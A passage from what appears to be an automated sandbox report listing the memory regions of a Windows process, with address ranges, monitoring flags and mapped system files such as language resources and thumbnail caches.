region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 10165 start_va = 0x2870000 end_va = 0x2874fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 10166 start_va = 0x2880000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 10167 start_va = 0x2900000 end_va = 0x2901fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 10168 start_va = 0x2910000 end_va = 0x2913fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 10169 start_va = 0x2920000 end_va = 0x2920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002920000" filename = "" Region: id = 10170 start_va = 0x2930000 end_va = 0x293dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 10171 start_va = 0x2940000 end_va = 0x2941fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002940000" filename = "" Region: id = 10172 start_va = 0x2950000 end_va = 0x2951fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002950000" filename = "" Region: id = 10173 start_va = 0x2960000 end_va = 0x2961fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002960000" filename = "" Region: id = 10174 start_va = 0x2970000 end_va = 0x2976fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 10175 start_va = 0x2980000 end_va = 0x2983fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10176 start_va = 0x2990000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 10177 start_va = 0x2a10000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 10178 start_va = 0x2a90000 end_va = 0x2a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 10179 start_va = 0x2aa0000 end_va = 0x2aa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 10180 start_va = 0x2ab0000 end_va = 0x2ab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 10181 start_va = 0x2ac0000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 10182 start_va = 0x2b40000 end_va = 0x2b87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 10183 start_va = 0x2b90000 end_va = 0x2b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 10184 start_va = 0x2ba0000 end_va = 0x2ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 10185 start_va = 0x2bb0000 end_va = 0x2bb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 10186 start_va = 0x2bc0000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 10187 start_va = 0x2c40000 end_va = 0x2c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 10188 start_va = 0x2c50000 end_va = 0x2c50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 10189 start_va = 0x2c60000 end_va = 0x2cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 10190 start_va = 0x2ce0000 end_va = 0x360ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 10191 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 10192 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 10193 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 10194 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 10195 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 10196 start_va = 0x3660000 end_va = 0x3660fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 10197 start_va = 0x3670000 end_va = 0x3673fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10198 start_va = 0x3680000 end_va = 0x3680fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{228385D3-B646-481B-B0DE-F0C3A58F5423}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db") Region: id = 10199 start_va = 0x3690000 end_va = 0x370ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 10200 start_va = 0x3710000 end_va = 0x3713fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10201 start_va = 0x3720000 end_va = 0x3720fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{87178F01-581A-45F0-9991-3F918FAA83F1}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db") Region: id = 10202 start_va = 0x3730000 end_va = 0x3733fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10203 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{C353F91E-D25F-48F0-A2CD-9F60B2681E9A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db") Region: id = 10204 start_va = 0x3750000 end_va = 0x3753fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10205 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{2F368D22-02BF-4413-97D1-C886CB140911}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db") Region: id = 10206 start_va = 0x3770000 end_va = 0x3770fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 10207 start_va = 0x3780000 end_va = 0x3781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003780000" filename = "" Region: id = 10208 start_va = 0x3790000 end_va = 0x3796fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 10209 start_va = 0x37d0000 end_va = 0x37d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037d0000" filename = "" Region: id = 10210 start_va = 0x37e0000 end_va = 0x37e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 10211 start_va = 0x37f0000 end_va = 0x37f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 10212 start_va = 0x3800000 end_va = 0x3800fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 10213 start_va = 0x3810000 end_va = 0x385ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003810000" filename = "" Region: id = 10214 start_va = 0x3890000 end_va = 0x3890fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 10215 start_va = 0x38a0000 end_va = 0x38a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 10216 start_va = 0x38b0000 end_va = 0x38b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038b0000" filename = "" Region: id = 10217 start_va = 0x38c0000 end_va = 0x38c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038c0000" filename = "" Region: id = 10218 start_va = 0x38d0000 end_va = 0x38d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 10219 start_va = 0x38e0000 end_va = 0x3915fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 10220 start_va = 0x3920000 end_va = 0x3920fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 10221 start_va = 0x3930000 end_va = 0x3930fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 10222 start_va = 0x3940000 end_va = 0x3940fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 10223 start_va = 0x3950000 end_va = 0x3950fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 10224 start_va = 0x3960000 end_va = 0x39dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003960000" filename = "" Region: id = 10225 start_va = 0x39e0000 end_va = 0x39e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039e0000" filename = "" Region: id = 10226 start_va = 0x39f0000 end_va = 0x39f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 10227 start_va = 0x3a00000 end_va = 0x3a00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 10228 start_va = 0x3a10000 end_va = 0x3a10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 10229 start_va = 0x3a20000 end_va = 0x3a23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 10230 start_va = 0x3a30000 end_va = 0x3a31fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 10231 start_va = 0x3a40000 end_va = 0x3abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a40000" filename = "" Region: id = 10232 start_va = 0x3ac0000 end_va = 0x3ac1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ac0000" filename = "" Region: id = 10233 start_va = 0x3ad0000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ad0000" filename = "" Region: id = 10234 start_va = 0x3b50000 end_va = 0x3b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b50000" filename = "" Region: id = 10235 start_va = 0x3b60000 end_va = 0x3bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 10236 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 10237 start_va = 0x3bf0000 end_va = 0x3bf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 10238 start_va = 0x3c00000 end_va = 0x3c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c00000" filename = "" Region: id = 10239 start_va = 0x3c10000 end_va = 0x3c11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c10000" filename = "" Region: id = 10240 start_va = 0x3c20000 end_va = 0x3c21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c20000" filename = "" Region: id = 10241 start_va = 0x3c30000 end_va = 0x3c30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alttab.dll.mui" filename = "\\Windows\\System32\\en-US\\AltTab.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\alttab.dll.mui") Region: id = 10242 start_va = 0x3c40000 end_va = 0x3c44fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 10243 start_va = 0x3c50000 end_va = 0x3ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 10244 start_va = 0x3cd0000 end_va = 0x3ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 10245 start_va = 0x3ed0000 end_va = 0x3ed1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ed0000" filename = "" Region: id = 10246 start_va = 0x3ee0000 end_va = 0x3f08fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 10247 start_va = 0x3f10000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 10248 start_va = 0x3f90000 end_va = 0x408ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 10249 start_va = 0x4090000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 10250 start_va = 0x4190000 end_va = 0x428ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 10251 start_va = 0x4290000 end_va = 0x430ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 10252 start_va = 0x4310000 end_va = 0x4311fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004310000" filename = "" Region: id = 10253 start_va = 0x4320000 end_va = 0x439ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 10254 start_va = 0x43a0000 end_va = 0x56f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 10255 start_va = 0x5700000 end_va = 0x577ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 10256 start_va = 0x5780000 end_va = 0x587ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 10257 start_va = 0x5880000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 10258 start_va = 0x5980000 end_va = 0x5a7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 10259 start_va = 0x5a80000 end_va = 0x5e82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a80000" filename = "" Region: id = 10260 start_va = 0x5e90000 end_va = 0x5f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e90000" filename = "" Region: id = 10261 start_va = 0x5f10000 end_va = 0x5f11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005f10000" filename = "" Region: id = 10262 start_va = 0x5f20000 end_va = 0x5f20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005f20000" filename = "" Region: id = 10263 start_va = 0x5f30000 end_va = 0x5f30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 10264 start_va = 0x5f40000 end_va = 0x5f40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 10265 start_va = 0x5f50000 end_va = 0x5f50fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 10266 start_va = 0x5f60000 end_va = 0x5f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f60000" filename = "" Region: id = 10267 start_va = 0x5f70000 end_va = 0x5f70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f70000" filename = "" Region: id = 10268 start_va = 0x5fb0000 end_va = 0x602ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fb0000" filename = "" Region: id = 10269 start_va = 0x6030000 end_va = 0x612ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 10270 start_va = 0x6130000 end_va = 0x622ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 10271 start_va = 0x6230000 end_va = 0x632ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 10272 start_va = 0x6360000 end_va = 0x63dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006360000" filename = "" Region: id = 10273 start_va = 0x6410000 end_va = 0x648ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006410000" filename = "" Region: id = 10274 start_va = 0x64d0000 end_va = 0x64dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064d0000" filename = "" Region: id = 10275 start_va = 0x64e0000 end_va = 0x655ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 10276 start_va = 0x6560000 end_va = 0x665ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 10277 start_va = 0x66c0000 end_va = 0x673ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066c0000" filename = "" Region: id = 10278 start_va = 0x6750000 end_va = 0x67cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 10279 start_va = 0x67f0000 end_va = 0x686ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067f0000" filename = "" Region: id = 10280 start_va = 0x6930000 end_va = 0x69affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006930000" filename = "" Region: id = 10281 start_va = 0x69c0000 end_va = 0x6a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069c0000" filename = "" Region: id = 10282 start_va = 0x6a90000 end_va = 0x6b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 10283 start_va = 0x6b90000 end_va = 0x6b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b90000" filename = "" Region: id = 10284 start_va = 0x6bc0000 end_va = 0x6c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006bc0000" filename = "" Region: id = 10285 start_va = 0x6c60000 end_va = 0x6cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c60000" filename = "" Region: id = 10286 start_va = 0x6d20000 end_va = 0x6d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d20000" filename = "" Region: id = 10287 start_va = 0x6e10000 end_va = 0x6e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e10000" filename = "" Region: id = 10288 start_va = 0x6e90000 end_va = 0x6f8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 10289 start_va = 0x6fa0000 end_va = 0x701ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006fa0000" filename = "" Region: id = 10290 start_va = 0x7020000 end_va = 0x711ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 10291 start_va = 0x7230000 end_va = 0x732ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 10292 start_va = 0x7330000 end_va = 0x742ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 10293 start_va = 0x7430000 end_va = 0x752ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 10294 start_va = 0x7530000 end_va = 0x76b8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007530000" filename = "" Region: id = 10295 start_va = 0x76e0000 end_va = 0x775ffff 